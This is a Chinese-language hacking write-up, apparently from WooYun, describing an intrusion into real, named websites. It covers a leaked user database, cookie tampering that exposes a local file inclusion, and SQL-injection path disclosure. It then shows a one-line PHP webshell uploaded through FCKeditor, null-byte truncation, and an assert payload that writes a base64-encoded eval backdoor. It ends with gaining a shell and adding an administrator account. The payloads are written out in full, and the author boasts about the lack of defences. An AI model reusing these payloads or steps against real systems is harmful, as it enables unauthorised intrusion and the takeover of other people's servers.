WooYun.org

第一部当然是扫目录，没说的4这站就有点垃圾了，能看目录下的文件。

分别打开几个顺眼的，Web.config，1.rar等文件都没什么用处。
./db下有新发现

5管理员的密码已经改了，但是其他用户的还能用。
这里我随便找了个登陆进去：ms8909009
结果发现，我居然打不开旁边的菜单、这个问题可以看源码直接打开连接，但是我还是没发现什么能够利用的。
仔细研究研究，发现身份这里可能有的用处

有什么用呢？我也不知道，但是我们来看下cookies

groupid亮了，说不定可以从这里突破，我们修改它看看，分别改成0，1，2，3，5
会员等级变了，同时改为0的时候出现了一点可能存在的漏洞。
因为它出错了！！！

很明显，包含漏洞可能存在。我们进入groupid目录看看是什么情况。

由此，我们可以得到包含的格式include “目录……”.getcookies(“groupid”).”.php”;
数字部分是通过cookie得到的，那么，我们不就可以自定义了吗。
这个是本地包含漏洞，那么我们要怎样上传一个文件让他包含？
测试了很久，我发现前面那个站和这个站是在同一个文件夹里，
怎么测试出来？当然是sql注入报错，爆出目录。
http://www.ahzxk.com/》http://www.cereal.com.cn/ahzxk
那么，这样我们不就可以在前一个站用fck上传文件，然后在进行包含。
其实当前站也是可以上传的（乱翻目录的时候在上传目录看到了前辈的死马xx.txt），但是不知道为什么无法我就用不了，可能我没找到，或者被修复了。
回归正题，我们上传一个小马（个人习惯）。
<?php $_GET[a]($_GET[b]);?>》wt.txt
找到路径：./ahzxk/medialive/upload/file/wt.txt
然后修改cookies，groupid=/../../ahzxk/medialive/upload/file/wt.txt
刷新看一看，还是出错。可以看到，被包含文件后面多了.php。
瞧我这机型，前面都说了它会自动加上.php
这问题很好解决，用%00就可以截断了
修改cookies，groupid=/../../ahzxk/medialive/upload/file/wt.txt%00

出现了这样的错误，说明，我们的文件已经成功包含进去了。
我们打开他的直接包含文件
http://www.cereal.com.cn/user/user_center/user_top.php
然后url后面还要加上：
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

出现了这样的警告，看来我们的小马已经成功写入了。
打开地址看看http://www.cereal.com.cn/user/user_center/c.php
Verygood。
自此完成getshell。

后面提权的就不说了，不看不知道，一看吓一跳，完全就是0防御，nt权限还没有防火墙和杀软，随便添加一个administrators账户，完虐！
虽然开启了3389，可惜是内网~~实在是可惜~~